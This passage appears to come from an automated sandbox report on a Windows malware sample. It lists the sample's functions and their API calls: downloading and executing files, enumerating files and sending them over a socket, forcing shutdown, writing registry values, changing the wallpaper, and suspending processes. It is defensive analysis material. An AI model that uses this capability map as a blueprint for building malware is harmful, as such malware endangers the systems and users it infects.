                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                              Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ManagerStart
                              • String ID:
                              • API String ID: 276877138-0
                              • Opcode ID: 5dd917813536b7672ac9c13df70b87255f00553c7d36e65651d1c6cfec5a07d5
                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                              • Opcode Fuzzy Hash: 5dd917813536b7672ac9c13df70b87255f00553c7d36e65651d1c6cfec5a07d5
                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                              Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                              • String ID: PowrProf.dll$SetSuspendState
                              • API String ID: 1589313981-1420736420
                              • Opcode ID: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                              • Opcode Fuzzy Hash: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                              Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                              • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                              Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                              Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 00407A91
                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstH_prologNext
                              • String ID:
                              • API String ID: 1157919129-0
                              • Opcode ID: b286cf0ee133902e80256ff5213cd56f18179fa9889be13e6ee793ceb973436e
                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                              • Opcode Fuzzy Hash: b286cf0ee133902e80256ff5213cd56f18179fa9889be13e6ee793ceb973436e
                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                              Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                              • _free.LIBCMT ref: 00448067
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                              • String ID:
                              • API String ID: 1286116820-0
                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                              • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                              • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                              Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                              Download Yara Rule
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 0040627F, 004063A7
                              • open, xrefs: 0040622E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DownloadExecuteFileShell
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$open
                              • API String ID: 2825088817-1951624179
                              • Opcode ID: 2acac90ea26ae282b1cd30d8d08bc46c13ee6813d0b29e7ff3fc117fdc8d2ab9
                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                              • Opcode Fuzzy Hash: 2acac90ea26ae282b1cd30d8d08bc46c13ee6813d0b29e7ff3fc117fdc8d2ab9
                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                              Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNextsend
                              • String ID: x@G$x@G
                              • API String ID: 4113138495-3390264752
                              • Opcode ID: 6a5bde3d623c5719039e20489b0154fabc7f00e7ca869c6ac5046c44b0028d50
                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                              • Opcode Fuzzy Hash: 6a5bde3d623c5719039e20489b0154fabc7f00e7ca869c6ac5046c44b0028d50
                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                              Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateInfoParametersSystemValue
                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                              • API String ID: 4127273184-3576401099
                              • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                              • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                              Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                              • String ID:
                              • API String ID: 4212172061-0
                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                              Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 00408DAC
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstH_prologNext
                              • String ID:
                              • API String ID: 301083792-0
                              • Opcode ID: 8cd490d13a866fc2f4052215e5e6d9fbdac938c0bb94ee783097021b8d2e99c8
                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                              • Opcode Fuzzy Hash: 8cd490d13a866fc2f4052215e5e6d9fbdac938c0bb94ee783097021b8d2e99c8
                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                              Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorInfoLastLocale$_free$_abort
                              • String ID:
                              • API String ID: 2829624132-0
                              • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                              • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                              Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                              Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                              • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                              • ExitProcess.KERNEL32 ref: 0044258E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                              Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
